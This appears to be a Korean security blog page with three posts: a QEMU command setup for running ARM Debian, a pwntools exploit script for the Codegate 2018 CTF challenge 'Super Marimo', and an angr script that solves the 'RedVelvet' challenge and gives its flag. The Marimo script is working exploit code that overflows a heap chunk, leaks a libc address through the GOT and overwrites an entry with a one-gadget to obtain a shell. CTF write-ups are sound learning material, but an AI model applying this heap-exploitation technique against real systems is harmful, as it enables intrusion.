arm in qemu

system 2018.02.10 18:45

Qemu 에서 ARM debian 실행

# apt-get install qemu

# wget https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2
# wget https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress
# wget https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpress

 

* CUI 환경 + 인터넷 사용

# qemu-system-arm -M vexpress-a9 \
    -kernel vmlinuz-3.2.0-4-vexpress \
    -initrd initrd.img-3.2.0-4-vexpress \
    -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \
    -append "root=/dev/mmcblk0p2 console=ttyAMA0" \
    -redir tcp:10022::22 -redir tcp:10080::80
    -nographic

'system' 카테고리의 다른 글

arm in qemu  (0) 2018.02.10
2017년 KUCIS 영남권 세미나  (0) 2017.06.30
[how2heap translation] house_of_einherjar.c  (0) 2017.06.26
[how2heap translation] overlapping_chunk.c  (0) 2017.06.26
[how2heap translation] house_of_lore.c  (0) 2017.06.21
[how2heap translation] poison_null_byte.c  (0) 2017.06.19
Posted by woodonggyu

# exploit.py

from pwn import *
from time import *


def ShowMe(name, profile):

        p.sendline('show me the marimo')
        print p.recvuntil('>> ')

        p.sendline(name)
        print p.recvuntil('>> ')

        p.sendline(profile)
        print p.recvuntil('>> ')

 

def View(index, data):

        p.sendline('V')
        print p.recvuntil('>> ')

        sleep(3)

        p.sendline(index)
        print p.recvuntil('>> ')

        p.sendline('M')
        print p.recvuntil('>> ')

        p.sendline(data)
        print p.recvuntil('>> ')

        p.sendline('B')
        print p.recvuntil('>> ')

 

def Leak(index):

        global puts, oneshot

        p.sendline('V')
        print p.recvuntil('>> ')

        p.sendline(index)
        data = p.recvuntil('>> ')

        puts = u64(data[82:88].ljust(8,'\x00'))
        libc = puts - 0x6f690
        oneshot = libc + 0x45216

        log.info('puts_libc = ' + hex(puts))
        log.info('libc = ' + hex(libc))
        log.info('oneshot = ' + hex(oneshot))

        p.sendline('B')
        print p.recvuntil('>> ')


def exploit(data):

        p.sendline('V')
        print p.recvuntil('>> ')

        p.sendline('0')
        print p.recvuntil('>> ')

        p.sendline('M')
        print p.recvuntil('>> ')

        p.sendline(data)
        print p.recvuntil('>> ')

        p.sendline('B')
        print p.recvuntil('>> ')

        p.sendline('V')
        print p.recvuntil('>> ')

        p.sendline('1')
        print p.recvuntil('>> ')

        p.sendline('M')
        print p.recvuntil('>> ')

        p.sendline(p64(oneshot))

        p.interactive()

 


if __name__ == '__main__':

        p = process('./marimo')

        print p.recvuntil('>> ')

        ShowMe('AAAA', 'BBBB')
        ShowMe('AAAA', 'BBBB')


        View('0', 'B'*32 + p64(0x0) + p64(0x21) + p64(0xffffffff) + p64(0x603018))

        Leak('1')

        exploit('C'*32 + p64(0x0) + p64(0x21) + p64(0xffffffff) + p64(0x603018) + p64(0x603018))

'ctf' 카테고리의 다른 글

[Codegate 2018 CTF] Super Marimo  (0) 2018.02.08
[Codegate 2018 CTF] RedVelvet  (0) 2018.02.08
[Codegate 2018 CTF] BaskinRobins31  (0) 2018.02.08
[BKP 2016 CTF] cookbook  (0) 2017.06.01
[DEFCON 2017 CTF] beatmeonthedl  (0) 2017.05.09
[DEFCON 2017 CTF] smashme  (0) 2017.05.08
Posted by woodonggyu

# exploit.py

import angr

def main():

        proj = angr.Project('./RedVelvet', load_options={'auto_load_libs': False})
        path_group = proj.factory.path_group(threads=4)
        path_group.explore(find=0x401631, avoid=(0x401621, 0x4016cb, ))
        return path_group.found[0].state.posix.dumps(1)

if __name__=='__main__':
        print(repr(main()))

 

결과 값은 "What_You_Wanna_Be?:)_lc_la" 가 나오게 되는데, 게싱을 통해 아래와 같이 정확한 플래그 알아냈다.

FLAG : What_You_Wanna_Be?:)_la_la

'ctf' 카테고리의 다른 글

[Codegate 2018 CTF] Super Marimo  (0) 2018.02.08
[Codegate 2018 CTF] RedVelvet  (0) 2018.02.08
[Codegate 2018 CTF] BaskinRobins31  (0) 2018.02.08
[BKP 2016 CTF] cookbook  (0) 2017.06.01
[DEFCON 2017 CTF] beatmeonthedl  (0) 2017.05.09
[DEFCON 2017 CTF] smashme  (0) 2017.05.08
Posted by woodonggyu